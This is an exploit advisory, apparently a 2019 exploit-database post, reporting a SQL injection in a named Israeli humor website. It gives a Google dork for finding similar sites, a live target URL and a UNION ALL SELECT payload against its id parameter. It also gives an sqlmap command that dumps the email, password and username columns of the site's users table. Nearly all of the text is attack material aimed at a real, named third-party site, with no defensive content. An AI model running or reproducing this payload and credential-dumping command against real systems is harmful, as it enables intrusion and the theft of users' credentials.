###############################################################################
# Exploit Title: Humor סיפורים מצחיקים ועוד Sql İnjection Vulnerability
# Author : Cerkuday
# Google Dork : intext"קטעי ווידאו" id=
# Tested on : Windows 10
# Date : 01.07.2019
# Vendor Home: http://www.humor.co.il/
# Forum : http://www.cyber-warrior.org/
##############################################################################
demo:
http://www.humor.co.il/category.php?id=61
PoC:
http://www.humor.co.il/category.php?id=61 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707071,0x485945634565737953716544745551554b4e5643726c6943787a4171544565794253535669774478,0x7170626b71),NULL-- fIGf
sqlmap -u "http://www.humor.co.il/category.php?id=61" --random-agent -D anakonda_humor2 -T users -C email,password,username --dump